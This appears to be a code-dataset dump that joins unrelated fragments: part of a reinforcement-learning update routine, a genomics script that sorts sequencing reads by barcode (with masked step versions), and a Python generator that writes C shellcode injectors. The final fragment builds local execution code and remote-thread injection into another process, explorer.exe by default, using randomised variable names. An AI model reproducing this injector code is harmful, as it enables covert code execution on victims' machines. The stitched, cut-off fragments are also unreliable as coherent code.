states.size())\n features_max[:, :3] = (features_max[:, :3] * ns[idx, 65]) / states[i, 65]\n features_max[:, 3:6] = (features_max[:, 3:6] * ns[idx, 66]) / states[i, 66]\n features_max[:, 6:9] = (features_max[:, 6:9] * ns[idx, 63]) / states[i, 63]\n features_max[:, 9:12] = (features_max[:, 9:12] * ns[idx, 64]) / states[i, 64]\n features_max[features_max == float('inf')] = 0\n# print(features_max)\n# input()\n f_max.append(features_max.view(-1))\n \n# if torch.sum(terminal == torch.sum(features_vector, dim = 1)) != len(terminal):\n# print(terminal)\n# print(features_vector)\n# input()\n q_max = torch.stack(q_max, dim = 1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n \n f_max = (1 - terminal.view(-1, 1)) * f_max\n \n q_target = reward + self.reinforce_config.discount_factor * q_max\n \n f_target = features_vector + self.reinforce_config.discount_factor * f_max\n \n# if torch.sum(reward).item() > 0:\n# print(reward)\n# print(feature_values)\n# print(q_target)\n# print(q_values)\n# input()\n # update model\n if (torch.sum(feature_values != feature_values).item() + torch.sum(f_target != f_target)).item() > 0:\n\n# print(\"1\")\n# print(features_vector)\n# print(\"2\")\n# print(feature_values)\n# print(\"3\")\n# print(f_target)\n# print(\"4\")\n# print(f_max)\n# print(\"5\")\n# print(states.tolist())\n# input()\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n\n # Update priorities\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-6 # prioritized_replay_eps\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n \n def load_model(self, model):\n self.eval_model.replace(model)\n \n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n \n def load_model(self, model):\n self.eval_model.replace(model)\n \n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)",
"step-ids": [
11,
16,
19,
22,
23
]
}
|
[
11,
16,
19,
22,
23
] |
"""
Process pair-end reads of barcode-guide-donor Step 1 cassette to generate a library reference table mapping barcodes to features.
Create dictionaries mapping barcodes to forward and reverse reads, split into sub-segments.
R1_dict: map barcodes to corresponding R1 sequences.
R2_dict: map barcodes to corresponding R2 sequences.
read_count_dict: map each barcode to corresponding total number of reads.
"""
from collections import Counter
import argparse
import gzip
import numpy as np
import pickle
parser = argparse.ArgumentParser()
parser.add_argument('-f', '-forward', required=True, help="forward sequencing files", nargs='+', action='store', dest='forward_files')
parser.add_argument('-r', '-reverse', required=True, help="reverse sequencing files", nargs='+', action='store', dest='reverse_files')
parser.add_argument('-s', '-segments', required=True, help="number of segments to split job into", action='store', dest='total_segments')
parser.add_argument('-o', '-out', required=True, help="keyword for saving output files", action='store', dest='out')
parser.add_argument('-c', '-cutoff', required=False, default=0, help="read count cutoff for barcodes to keep (default=0)", action='store', dest='cutoff')
parser.add_argument('-b', '-barcode', required=False, default=31, help="length of barcode (default=31)", action='store', dest='barcode_length')
parser.add_argument('-bq', '-bquality', required=False, default=53, help="ascii quality score cutoff for barcode (default=53)", action='store', dest='barcode_quality')
parser.add_argument('-gdq', '-gdquality', required=False, default=55, help="ascii quality score cutoff for guide-donor (default=55)", action='store', dest='guide_donor_quality')
args = parser.parse_args()
OUTPUT_HEADER = args.out
READ_COUNT_CUTOFF = int(args.cutoff)
BARCODE_LENGTH = int(args.barcode_length)
BARCODE_QUALITY_CUTOFF = int(args.barcode_quality)
GUIDE_DONOR_QUALITY_CUTOFF = int(args.guide_donor_quality)
# Collect all sequencing reads from forward files.
forward_lines = []
for file in args.forward_files:
forward_lines.extend(gzip.open(file).readlines())
# Forward sequence.
forward_sequence = [forward_lines[r] for r in range(1, len(forward_lines), 4)]
forward_sequence = [l.decode('utf-8').replace("\n","") for l in forward_sequence]
# Forward sequence quality scores.
forward_quality = [forward_lines[r] for r in range(3, len(forward_lines), 4)]
forward_quality = [l.decode('utf-8').replace("\n","") for l in forward_quality]
barcode_quality_scores = [] # Barcode quality.
for line in forward_quality:
scores = [ord(i) for i in line[:BARCODE_LENGTH]]
barcode_quality_scores.append(np.mean(scores))
forward_guide_donor_quality_scores = [] # Guide-donor quality.
for line in forward_quality:
scores = [ord(i) for i in line[BARCODE_LENGTH:]]
forward_guide_donor_quality_scores.append(np.mean(scores))
# Collect all sequencing reads from reverse files.
reverse_lines = []
for file in args.reverse_files:
reverse_lines.extend(gzip.open(file).readlines())
# Reverse sequence.
reverse_sequence = [reverse_lines[r] for r in range(1, len(reverse_lines), 4)]
reverse_sequence = [l.decode('utf-8').replace("\n","") for l in reverse_sequence]
# Reverse sequence base quality scores.
reverse_quality = [reverse_lines[r] for r in range(3, len(reverse_lines), 4)]
reverse_quality = [l.decode('utf-8').replace("\n","") for l in reverse_quality]
reverse_guide_donor_quality_scores = []
for line in reverse_quality:
scores = [ord(i) for i in line]
reverse_guide_donor_quality_scores.append(np.mean(scores))
# Filter out low quality barcodes and low quality guide-donor sequences.
forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, f[:BARCODE_LENGTH]) for f, r, fscore, fscore2, rscore
in zip(forward_sequence, reverse_sequence, barcode_quality_scores, forward_guide_donor_quality_scores, reverse_guide_donor_quality_scores)
if (fscore >= BARCODE_QUALITY_CUTOFF) and (fscore2 >= GUIDE_DONOR_QUALITY_CUTOFF) and (rscore >= GUIDE_DONOR_QUALITY_CUTOFF)])
if (READ_COUNT_CUTOFF != 0): # optional choice to remove low read barcodes from annotations.
barcodes_to_keep = [key for key, count in Counter(barcodes).items() if count >= READ_COUNT_CUTOFF]
keep_dict = {g: True for g in barcodes_to_keep}
forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r, b
in zip(forward_sequence, reverse_sequence, barcodes) if b in keep_dict])
# Store barcode read count dictionary for later use.
count_dict = dict(Counter(barcodes))
pickle_out = open(OUTPUT_HEADER + ".read_count_dict", "wb")
pickle.dump(count_dict, pickle_out, protocol=2)
pickle_out.close()
# Divide up barcodes into specified number of segments for parallel analysis.
LENGTH = len(set(barcodes))
total_segments = int(args.total_segments)
barcode_list = list(set(barcodes))
for segment in range(0, total_segments):
start = int((LENGTH/total_segments)*segment) # determine start and end position of segment.
if (segment+1 == total_segments):
sub_barcodes_set = barcode_list[start:]
else:
stop = int((LENGTH/total_segments)*(segment+1))
sub_barcodes_set = barcode_list[start:stop]
sub_barcodes_dict = {b: True for b in sub_barcodes_set}
sub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b
in zip(forward_sequence, reverse_sequence, barcodes) if b in sub_barcodes_dict])
R1_dict, R2_dict = {}, {} # store reads by barcode into R1 and R2 dictionaries.
for f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):
if (b not in R1_dict) and (b not in R2_dict):
R1_dict[b] = [f]
R2_dict[b] = [r]
else:
R1_dict[b].append(f)
R2_dict[b].append(r)
pickle_out = open(OUTPUT_HEADER + "_" + str(segment) + "-" + str(total_segments) + ".R1_dict", "wb")
pickle.dump(R1_dict, pickle_out, protocol=2)
pickle_out.close()
pickle_out = open(OUTPUT_HEADER + "_" + str(segment) + "-" + str(total_segments) + ".R2_dict", "wb")
pickle.dump(R2_dict, pickle_out, protocol=2)
pickle_out.close()
|
normal
|
{
"blob_id": "9206e4c4eff8ca64266ce53705e88069912b80d8",
"index": 1526,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('-f', '-forward', required=True, help=\n 'forward sequencing files', nargs='+', action='store', dest='forward_files'\n )\nparser.add_argument('-r', '-reverse', required=True, help=\n 'reverse sequencing files', nargs='+', action='store', dest='reverse_files'\n )\nparser.add_argument('-s', '-segments', required=True, help=\n 'number of segments to split job into', action='store', dest=\n 'total_segments')\nparser.add_argument('-o', '-out', required=True, help=\n 'keyword for saving output files', action='store', dest='out')\nparser.add_argument('-c', '-cutoff', required=False, default=0, help=\n 'read count cutoff for barcodes to keep (default=0)', action='store',\n dest='cutoff')\nparser.add_argument('-b', '-barcode', required=False, default=31, help=\n 'length of barcode (default=31)', action='store', dest='barcode_length')\nparser.add_argument('-bq', '-bquality', required=False, default=53, help=\n 'ascii quality score cutoff for barcode (default=53)', action='store',\n dest='barcode_quality')\nparser.add_argument('-gdq', '-gdquality', required=False, default=55, help=\n 'ascii quality score cutoff for guide-donor (default=55)', action=\n 'store', dest='guide_donor_quality')\n<mask token>\nfor file in args.forward_files:\n forward_lines.extend(gzip.open(file).readlines())\n<mask token>\nfor line in forward_quality:\n scores = [ord(i) for i in line[:BARCODE_LENGTH]]\n barcode_quality_scores.append(np.mean(scores))\n<mask token>\nfor line in forward_quality:\n scores = [ord(i) for i in line[BARCODE_LENGTH:]]\n forward_guide_donor_quality_scores.append(np.mean(scores))\n<mask token>\nfor file in args.reverse_files:\n reverse_lines.extend(gzip.open(file).readlines())\n<mask token>\nfor line in reverse_quality:\n scores = [ord(i) for i in line]\n reverse_guide_donor_quality_scores.append(np.mean(scores))\n<mask token>\nif READ_COUNT_CUTOFF != 0:\n barcodes_to_keep = [key for key, count in Counter(barcodes).items() if \n count >= READ_COUNT_CUTOFF]\n keep_dict = {g: (True) for g in barcodes_to_keep}\n forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r,\n b in zip(forward_sequence, reverse_sequence, barcodes) if b in\n keep_dict])\n<mask token>\npickle.dump(count_dict, pickle_out, protocol=2)\npickle_out.close()\n<mask token>\nfor segment in range(0, total_segments):\n start = int(LENGTH / total_segments * segment)\n if segment + 1 == total_segments:\n sub_barcodes_set = barcode_list[start:]\n else:\n stop = int(LENGTH / total_segments * (segment + 1))\n sub_barcodes_set = barcode_list[start:stop]\n sub_barcodes_dict = {b: (True) for b in sub_barcodes_set}\n sub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b in\n zip(forward_sequence, reverse_sequence, barcodes) if b in\n sub_barcodes_dict])\n R1_dict, R2_dict = {}, {}\n for f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):\n if b not in R1_dict and b not in R2_dict:\n R1_dict[b] = [f]\n R2_dict[b] = [r]\n else:\n R1_dict[b].append(f)\n R2_dict[b].append(r)\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R1_dict', 'wb')\n pickle.dump(R1_dict, pickle_out, protocol=2)\n pickle_out.close()\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R2_dict', 'wb')\n pickle.dump(R2_dict, pickle_out, protocol=2)\n pickle_out.close()\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '-forward', required=True, help=\n 'forward sequencing files', nargs='+', action='store', dest='forward_files'\n )\nparser.add_argument('-r', '-reverse', required=True, help=\n 'reverse sequencing files', nargs='+', action='store', dest='reverse_files'\n )\nparser.add_argument('-s', '-segments', required=True, help=\n 'number of segments to split job into', action='store', dest=\n 'total_segments')\nparser.add_argument('-o', '-out', required=True, help=\n 'keyword for saving output files', action='store', dest='out')\nparser.add_argument('-c', '-cutoff', required=False, default=0, help=\n 'read count cutoff for barcodes to keep (default=0)', action='store',\n dest='cutoff')\nparser.add_argument('-b', '-barcode', required=False, default=31, help=\n 'length of barcode (default=31)', action='store', dest='barcode_length')\nparser.add_argument('-bq', '-bquality', required=False, default=53, help=\n 'ascii quality score cutoff for barcode (default=53)', action='store',\n dest='barcode_quality')\nparser.add_argument('-gdq', '-gdquality', required=False, default=55, help=\n 'ascii quality score cutoff for guide-donor (default=55)', action=\n 'store', dest='guide_donor_quality')\nargs = parser.parse_args()\nOUTPUT_HEADER = args.out\nREAD_COUNT_CUTOFF = int(args.cutoff)\nBARCODE_LENGTH = int(args.barcode_length)\nBARCODE_QUALITY_CUTOFF = int(args.barcode_quality)\nGUIDE_DONOR_QUALITY_CUTOFF = int(args.guide_donor_quality)\nforward_lines = []\nfor file in args.forward_files:\n forward_lines.extend(gzip.open(file).readlines())\nforward_sequence = [forward_lines[r] for r in range(1, len(forward_lines), 4)]\nforward_sequence = [l.decode('utf-8').replace('\\n', '') for l in\n forward_sequence]\nforward_quality = [forward_lines[r] for r in range(3, len(forward_lines), 4)]\nforward_quality = [l.decode('utf-8').replace('\\n', '') for l in forward_quality\n ]\nbarcode_quality_scores = []\nfor line in forward_quality:\n scores = [ord(i) for i in line[:BARCODE_LENGTH]]\n barcode_quality_scores.append(np.mean(scores))\nforward_guide_donor_quality_scores = []\nfor line in forward_quality:\n scores = [ord(i) for i in line[BARCODE_LENGTH:]]\n forward_guide_donor_quality_scores.append(np.mean(scores))\nreverse_lines = []\nfor file in args.reverse_files:\n reverse_lines.extend(gzip.open(file).readlines())\nreverse_sequence = [reverse_lines[r] for r in range(1, len(reverse_lines), 4)]\nreverse_sequence = [l.decode('utf-8').replace('\\n', '') for l in\n reverse_sequence]\nreverse_quality = [reverse_lines[r] for r in range(3, len(reverse_lines), 4)]\nreverse_quality = [l.decode('utf-8').replace('\\n', '') for l in reverse_quality\n ]\nreverse_guide_donor_quality_scores = []\nfor line in reverse_quality:\n scores = [ord(i) for i in line]\n reverse_guide_donor_quality_scores.append(np.mean(scores))\nforward_sequence, reverse_sequence, barcodes = zip(*[(f, r, f[:\n BARCODE_LENGTH]) for f, r, fscore, fscore2, rscore in zip(\n forward_sequence, reverse_sequence, barcode_quality_scores,\n forward_guide_donor_quality_scores, reverse_guide_donor_quality_scores) if\n fscore >= BARCODE_QUALITY_CUTOFF and fscore2 >=\n GUIDE_DONOR_QUALITY_CUTOFF and rscore >= GUIDE_DONOR_QUALITY_CUTOFF])\nif READ_COUNT_CUTOFF != 0:\n barcodes_to_keep = [key for key, count in Counter(barcodes).items() if \n count >= READ_COUNT_CUTOFF]\n keep_dict = {g: (True) for g in barcodes_to_keep}\n forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r,\n b in zip(forward_sequence, reverse_sequence, barcodes) if b in\n keep_dict])\ncount_dict = dict(Counter(barcodes))\npickle_out = open(OUTPUT_HEADER + '.read_count_dict', 'wb')\npickle.dump(count_dict, pickle_out, protocol=2)\npickle_out.close()\nLENGTH = len(set(barcodes))\ntotal_segments = int(args.total_segments)\nbarcode_list = list(set(barcodes))\nfor segment in range(0, total_segments):\n start = int(LENGTH / total_segments * segment)\n if segment + 1 == total_segments:\n sub_barcodes_set = barcode_list[start:]\n else:\n stop = int(LENGTH / total_segments * (segment + 1))\n sub_barcodes_set = barcode_list[start:stop]\n sub_barcodes_dict = {b: (True) for b in sub_barcodes_set}\n sub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b in\n zip(forward_sequence, reverse_sequence, barcodes) if b in\n sub_barcodes_dict])\n R1_dict, R2_dict = {}, {}\n for f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):\n if b not in R1_dict and b not in R2_dict:\n R1_dict[b] = [f]\n R2_dict[b] = [r]\n else:\n R1_dict[b].append(f)\n R2_dict[b].append(r)\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R1_dict', 'wb')\n pickle.dump(R1_dict, pickle_out, protocol=2)\n pickle_out.close()\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R2_dict', 'wb')\n pickle.dump(R2_dict, pickle_out, protocol=2)\n pickle_out.close()\n",
"step-4": "<mask token>\nfrom collections import Counter\nimport argparse\nimport gzip\nimport numpy as np\nimport pickle\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '-forward', required=True, help=\n 'forward sequencing files', nargs='+', action='store', dest='forward_files'\n )\nparser.add_argument('-r', '-reverse', required=True, help=\n 'reverse sequencing files', nargs='+', action='store', dest='reverse_files'\n )\nparser.add_argument('-s', '-segments', required=True, help=\n 'number of segments to split job into', action='store', dest=\n 'total_segments')\nparser.add_argument('-o', '-out', required=True, help=\n 'keyword for saving output files', action='store', dest='out')\nparser.add_argument('-c', '-cutoff', required=False, default=0, help=\n 'read count cutoff for barcodes to keep (default=0)', action='store',\n dest='cutoff')\nparser.add_argument('-b', '-barcode', required=False, default=31, help=\n 'length of barcode (default=31)', action='store', dest='barcode_length')\nparser.add_argument('-bq', '-bquality', required=False, default=53, help=\n 'ascii quality score cutoff for barcode (default=53)', action='store',\n dest='barcode_quality')\nparser.add_argument('-gdq', '-gdquality', required=False, default=55, help=\n 'ascii quality score cutoff for guide-donor (default=55)', action=\n 'store', dest='guide_donor_quality')\nargs = parser.parse_args()\nOUTPUT_HEADER = args.out\nREAD_COUNT_CUTOFF = int(args.cutoff)\nBARCODE_LENGTH = int(args.barcode_length)\nBARCODE_QUALITY_CUTOFF = int(args.barcode_quality)\nGUIDE_DONOR_QUALITY_CUTOFF = int(args.guide_donor_quality)\nforward_lines = []\nfor file in args.forward_files:\n forward_lines.extend(gzip.open(file).readlines())\nforward_sequence = [forward_lines[r] for r in range(1, len(forward_lines), 4)]\nforward_sequence = [l.decode('utf-8').replace('\\n', '') for l in\n forward_sequence]\nforward_quality = [forward_lines[r] for r in range(3, len(forward_lines), 4)]\nforward_quality = [l.decode('utf-8').replace('\\n', '') for l in forward_quality\n ]\nbarcode_quality_scores = []\nfor line in forward_quality:\n scores = [ord(i) for i in line[:BARCODE_LENGTH]]\n barcode_quality_scores.append(np.mean(scores))\nforward_guide_donor_quality_scores = []\nfor line in forward_quality:\n scores = [ord(i) for i in line[BARCODE_LENGTH:]]\n forward_guide_donor_quality_scores.append(np.mean(scores))\nreverse_lines = []\nfor file in args.reverse_files:\n reverse_lines.extend(gzip.open(file).readlines())\nreverse_sequence = [reverse_lines[r] for r in range(1, len(reverse_lines), 4)]\nreverse_sequence = [l.decode('utf-8').replace('\\n', '') for l in\n reverse_sequence]\nreverse_quality = [reverse_lines[r] for r in range(3, len(reverse_lines), 4)]\nreverse_quality = [l.decode('utf-8').replace('\\n', '') for l in reverse_quality\n ]\nreverse_guide_donor_quality_scores = []\nfor line in reverse_quality:\n scores = [ord(i) for i in line]\n reverse_guide_donor_quality_scores.append(np.mean(scores))\nforward_sequence, reverse_sequence, barcodes = zip(*[(f, r, f[:\n BARCODE_LENGTH]) for f, r, fscore, fscore2, rscore in zip(\n forward_sequence, reverse_sequence, barcode_quality_scores,\n forward_guide_donor_quality_scores, reverse_guide_donor_quality_scores) if\n fscore >= BARCODE_QUALITY_CUTOFF and fscore2 >=\n GUIDE_DONOR_QUALITY_CUTOFF and rscore >= GUIDE_DONOR_QUALITY_CUTOFF])\nif READ_COUNT_CUTOFF != 0:\n barcodes_to_keep = [key for key, count in Counter(barcodes).items() if \n count >= READ_COUNT_CUTOFF]\n keep_dict = {g: (True) for g in barcodes_to_keep}\n forward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r,\n b in zip(forward_sequence, reverse_sequence, barcodes) if b in\n keep_dict])\ncount_dict = dict(Counter(barcodes))\npickle_out = open(OUTPUT_HEADER + '.read_count_dict', 'wb')\npickle.dump(count_dict, pickle_out, protocol=2)\npickle_out.close()\nLENGTH = len(set(barcodes))\ntotal_segments = int(args.total_segments)\nbarcode_list = list(set(barcodes))\nfor segment in range(0, total_segments):\n start = int(LENGTH / total_segments * segment)\n if segment + 1 == total_segments:\n sub_barcodes_set = barcode_list[start:]\n else:\n stop = int(LENGTH / total_segments * (segment + 1))\n sub_barcodes_set = barcode_list[start:stop]\n sub_barcodes_dict = {b: (True) for b in sub_barcodes_set}\n sub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b in\n zip(forward_sequence, reverse_sequence, barcodes) if b in\n sub_barcodes_dict])\n R1_dict, R2_dict = {}, {}\n for f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):\n if b not in R1_dict and b not in R2_dict:\n R1_dict[b] = [f]\n R2_dict[b] = [r]\n else:\n R1_dict[b].append(f)\n R2_dict[b].append(r)\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R1_dict', 'wb')\n pickle.dump(R1_dict, pickle_out, protocol=2)\n pickle_out.close()\n pickle_out = open(OUTPUT_HEADER + '_' + str(segment) + '-' + str(\n total_segments) + '.R2_dict', 'wb')\n pickle.dump(R2_dict, pickle_out, protocol=2)\n pickle_out.close()\n",
"step-5": "\"\"\"\nProcess pair-end reads of barcode-guide-donor Step 1 cassette to generate a library reference table mapping barcodes to features.\nCreate dictionaries mapping barcodes to forward and reverse reads, split into sub-segments.\n\nR1_dict: map barcodes to corresponding R1 sequences.\nR2_dict: map barcodes to corresponding R2 sequences.\nread_count_dict: map each barcode to corresponding total number of reads.\n\n\"\"\"\n\nfrom collections import Counter\nimport argparse\nimport gzip\nimport numpy as np\nimport pickle\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '-forward', required=True, help=\"forward sequencing files\", nargs='+', action='store', dest='forward_files')\nparser.add_argument('-r', '-reverse', required=True, help=\"reverse sequencing files\", nargs='+', action='store', dest='reverse_files')\nparser.add_argument('-s', '-segments', required=True, help=\"number of segments to split job into\", action='store', dest='total_segments')\nparser.add_argument('-o', '-out', required=True, help=\"keyword for saving output files\", action='store', dest='out')\nparser.add_argument('-c', '-cutoff', required=False, default=0, help=\"read count cutoff for barcodes to keep (default=0)\", action='store', dest='cutoff')\nparser.add_argument('-b', '-barcode', required=False, default=31, help=\"length of barcode (default=31)\", action='store', dest='barcode_length')\nparser.add_argument('-bq', '-bquality', required=False, default=53, help=\"ascii quality score cutoff for barcode (default=53)\", action='store', dest='barcode_quality')\nparser.add_argument('-gdq', '-gdquality', required=False, default=55, help=\"ascii quality score cutoff for guide-donor (default=55)\", action='store', dest='guide_donor_quality')\n\nargs = parser.parse_args()\n\nOUTPUT_HEADER = args.out\nREAD_COUNT_CUTOFF = int(args.cutoff)\nBARCODE_LENGTH = int(args.barcode_length)\nBARCODE_QUALITY_CUTOFF = int(args.barcode_quality)\nGUIDE_DONOR_QUALITY_CUTOFF = int(args.guide_donor_quality)\n\n# Collect all sequencing reads from forward files.\nforward_lines = []\nfor file in args.forward_files:\n\tforward_lines.extend(gzip.open(file).readlines())\n\n# Forward sequence.\nforward_sequence = [forward_lines[r] for r in range(1, len(forward_lines), 4)]\nforward_sequence = [l.decode('utf-8').replace(\"\\n\",\"\") for l in forward_sequence]\n\n# Forward sequence quality scores.\nforward_quality = [forward_lines[r] for r in range(3, len(forward_lines), 4)]\nforward_quality = [l.decode('utf-8').replace(\"\\n\",\"\") for l in forward_quality]\n\nbarcode_quality_scores = [] # Barcode quality.\nfor line in forward_quality:\n scores = [ord(i) for i in line[:BARCODE_LENGTH]]\n barcode_quality_scores.append(np.mean(scores))\n\nforward_guide_donor_quality_scores = [] # Guide-donor quality.\nfor line in forward_quality:\n scores = [ord(i) for i in line[BARCODE_LENGTH:]]\n forward_guide_donor_quality_scores.append(np.mean(scores))\n\n# Collect all sequencing reads from reverse files.\nreverse_lines = []\nfor file in args.reverse_files:\n\treverse_lines.extend(gzip.open(file).readlines())\n\n# Reverse sequence.\nreverse_sequence = [reverse_lines[r] for r in range(1, len(reverse_lines), 4)]\nreverse_sequence = [l.decode('utf-8').replace(\"\\n\",\"\") for l in reverse_sequence]\n\n# Reverse sequence base quality scores.\nreverse_quality = [reverse_lines[r] for r in range(3, len(reverse_lines), 4)]\nreverse_quality = [l.decode('utf-8').replace(\"\\n\",\"\") for l in reverse_quality]\n\nreverse_guide_donor_quality_scores = []\nfor line in reverse_quality:\n scores = [ord(i) for i in line]\n reverse_guide_donor_quality_scores.append(np.mean(scores))\n\n# Filter out low quality barcodes and low quality guide-donor sequences.\nforward_sequence, reverse_sequence, barcodes = zip(*[(f, r, f[:BARCODE_LENGTH]) for f, r, fscore, fscore2, rscore\n in zip(forward_sequence, reverse_sequence, barcode_quality_scores, forward_guide_donor_quality_scores, reverse_guide_donor_quality_scores) \n if (fscore >= BARCODE_QUALITY_CUTOFF) and (fscore2 >= GUIDE_DONOR_QUALITY_CUTOFF) and (rscore >= GUIDE_DONOR_QUALITY_CUTOFF)])\n\nif (READ_COUNT_CUTOFF != 0): # optional choice to remove low read barcodes from annotations.\n\tbarcodes_to_keep = [key for key, count in Counter(barcodes).items() if count >= READ_COUNT_CUTOFF]\n\tkeep_dict = {g: True for g in barcodes_to_keep}\n\tforward_sequence, reverse_sequence, barcodes = zip(*[(f, r, b) for f, r, b \n\t\tin zip(forward_sequence, reverse_sequence, barcodes) if b in keep_dict])\n\n# Store barcode read count dictionary for later use. \ncount_dict = dict(Counter(barcodes))\npickle_out = open(OUTPUT_HEADER + \".read_count_dict\", \"wb\")\npickle.dump(count_dict, pickle_out, protocol=2)\npickle_out.close()\n\n# Divide up barcodes into specified number of segments for parallel analysis.\nLENGTH = len(set(barcodes))\ntotal_segments = int(args.total_segments)\n\nbarcode_list = list(set(barcodes))\nfor segment in range(0, total_segments):\n\tstart = int((LENGTH/total_segments)*segment) # determine start and end position of segment.\n\tif (segment+1 == total_segments):\n\t\tsub_barcodes_set = barcode_list[start:]\n\telse:\n\t\tstop = int((LENGTH/total_segments)*(segment+1))\n\t\tsub_barcodes_set = barcode_list[start:stop]\n\tsub_barcodes_dict = {b: True for b in sub_barcodes_set}\n\n\tsub_forward, sub_reverse, sub_barcodes = zip(*[(f, r, b) for f, r, b \n\t\tin zip(forward_sequence, reverse_sequence, barcodes) if b in sub_barcodes_dict])\n\n\tR1_dict, R2_dict = {}, {} # store reads by barcode into R1 and R2 dictionaries.\n\tfor f, r, b in zip(sub_forward, sub_reverse, sub_barcodes):\n\t\tif (b not in R1_dict) and (b not in R2_dict):\n\t\t\tR1_dict[b] = [f]\n\t\t\tR2_dict[b] = [r]\n\t\telse:\n\t\t\tR1_dict[b].append(f)\n\t\t\tR2_dict[b].append(r)\n\n\tpickle_out = open(OUTPUT_HEADER + \"_\" + str(segment) + \"-\" + str(total_segments) + \".R1_dict\", \"wb\")\n\tpickle.dump(R1_dict, pickle_out, protocol=2)\n\tpickle_out.close()\n\n\tpickle_out = open(OUTPUT_HEADER + \"_\" + str(segment) + \"-\" + str(total_segments) + \".R2_dict\", \"wb\")\n\tpickle.dump(R2_dict, pickle_out, protocol=2)\n\tpickle_out.close()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def Start():
Start_Code = '#include <windows.h>\n'
Start_Code += '#include <tlhelp32.h>\n'
Start_Code += '#include <stdio.h>\n'
Start_Code += '#include <stdlib.h>\n'
Start_Code += '#include <string.h>\n'
Start_Code += 'int main(int argc, char **argv) {'
Start_Code += 'char ' + Shellcode + '[] = {'
return Start_Code
<|reserved_special_token_0|>
def Local_Or_Remote():
print(
"""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
"""
)
Choice = core.core_input()
if Choice == '1':
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == '2':
print(
"""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
"""
)
ProcessName = core.core_input()
if ProcessName != '':
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = 'explorer.exe'
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = ('void *' + Exec +
' = VirtualAlloc(0, sizeof ' + Shellcode +
', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')
Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +
', sizeof ' + Shellcode + ');')
Local_Thread_Injection += '((void(*)())' + Exec + ')();}'
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'
Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'
Remote_Thread_Injection += ('HANDLE ' + Snapshot +
' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')
Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +
Entry + ') == TRUE){')
Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +
'"' + ProcessName + '"' + ') == 0){')
Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'
Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'
Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'
Remote_Thread_Injection += (Process_Handle +
' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +
'.th32ProcessID);')
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +
Process_Handle + ', NULL, sizeof ' + Shellcode +
', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')
Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +
', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +
', NULL);')
Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +
Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +
Remote_Buffer + ', NULL, 0, NULL);')
Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'
